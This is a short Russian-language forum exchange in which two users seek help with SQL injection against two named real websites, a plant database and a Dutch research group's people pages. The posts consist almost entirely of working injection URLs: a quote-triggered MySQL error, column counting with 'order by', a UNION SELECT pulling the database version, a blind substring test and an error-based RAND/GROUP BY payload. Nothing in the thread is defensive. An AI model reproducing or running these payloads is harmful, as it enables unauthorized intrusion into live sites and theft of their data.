Сообщение от
haito
привет команде;
Можно ли придать этим сайтом? потому что я пытался, но никакого результата
http://www.aquaticplantcentral.com/forumapc/plantfinder/details.php?id=36%27
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''36''' at line 1
http://www.aquaticplantcentral.com/forumapc/plantfinder/details.php?id=36%20order%20by%201000-- <-true
_http://www.aquaticplantcentral.com/forumapc/plantfinder/details.php?id=-36'+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22--+
Сообщение от
FlaktW
Здесь есть SQL-inj?
http://www.bigr.nl/website/structure/main.php?page=people&subpage=person&id=51'+order+b y+1000+--+
_http://www.bigr.nl/website/index.php?page=people&subpage=person&id=JifkeVeenl and')+and+substring(version(),1,1)=5+and+('1'='1
или через ошибку
_http://www.bigr.nl/website/index.php?page=people&subpage=person&id=JifkeVeenl and')+and+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SE LECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID(VERSIO N(),1,63),+FLOOR(RAND(0)*2)))+and+('1'='1
не смог больше ничего придумать..